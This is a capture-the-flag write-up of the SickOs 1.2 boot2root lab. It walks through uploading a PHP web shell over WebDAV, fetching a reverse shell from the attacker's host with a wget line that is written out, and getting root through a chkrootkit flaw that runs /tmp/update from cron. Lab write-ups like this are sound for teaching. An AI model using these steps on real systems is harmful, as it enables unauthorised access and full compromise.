Fully Sick(Os) 1.2 mate

It’s been a while since I have looked at any boot2root challenges, so let’s have a crack at SickOs: 1.2 by @D4rk36

“This is second in following series from SickOs and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.”

Bit of a side note before we start. The description mentions “Need to use VMware. You may have issue with VirtualBox.”. If you wish to use virtualbox, as I did, all you need to do is edit the .ovf file and replace all instances of “ElementName” with “Caption” and replace “vmware.sata.ahci” with “AHCI”. Then simply delete the .mf file and import the ovf into virtualbox as you would normally.

Ok.. enough chatter.. let’s get started! First up, what IP are we attacking:

Let’s find our starting point…

Let’s take a look at the web server in our browser.

blow

Now let’s take a look with curl.

As the comment says, there’s nothing there, so we’ll fuzz for directories.

Taking a look at the /test/ reveals that directory listing is enabled for this server.

Selection_002

What options are available to us?

Nothing exciting on the root directory, but /test looks a little more promising with DAV and the use of dangerous options. Let’s try and upload a simple shell to test connectivity.

Success. I tried running netcat and a bash reverse shell from this simple cmd shell, however I wasn’t having any luck getting a connection.

Selection_001

Time to upload a bigger PHP shell. At first it failed with port 80, so I set the listening port to 443.

Success.

http://192.168.77.50/test/phpsimpleshell.php?cmd=wget%20192.168.77.43:443/phprevshell.php

Now it is just a simple case of setting up a listener and kicking off our shell.

Enter stage left laziness. I check for any low hanging fruit with Security Sift’s linuxprivchecker script.

Unfortunately linuxprivchecker didn’t lead me to any vulnerabilities or exploits, so I started the manual enumeration of the system. Time passed, more time passed, and a little more time passed. Nothing, nada, nicht.

I take another look at the linuxprivchecker output, and focus in on root’s cronjobs.

All of the services/binaries look fine to me, apart from chkrootkit.

Bingo! This version of chkrootkit has a local root vulnerability which can be found here.

As per the authors findings, the steps to reproduce are:

"- Put an executable file named 'update' with non-root owner in /tmp (not mounted noexec, obviously)
- Run chkrootkit (as uid 0)

Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.

If an attacker knows you are periodically running chkrootkit (like in cron.daily) and has write access to /tmp (not mounted noexec), he may easily take advantage of this."

Too easy. I’ll use my faithful suid binary for this one.

All we need to do is compile it in /tmp, setup an 'update' script to chmod/chown the suid binary, and voila… we should have root.

Now… we sit patiently and wait for the chkrootkit crontab to execute. After a little time, we have our suid binary ready to rock and roll.

Let’s get root!

And let’s grab the flag!

THE END

Thanks for the SickOS 1.2 boot2root challenge @D4rk36.

Thank you like always @Vulnhub and @g0tmi1k for hosting such awesome challenges.

Until next time, tight lines and happy hacking.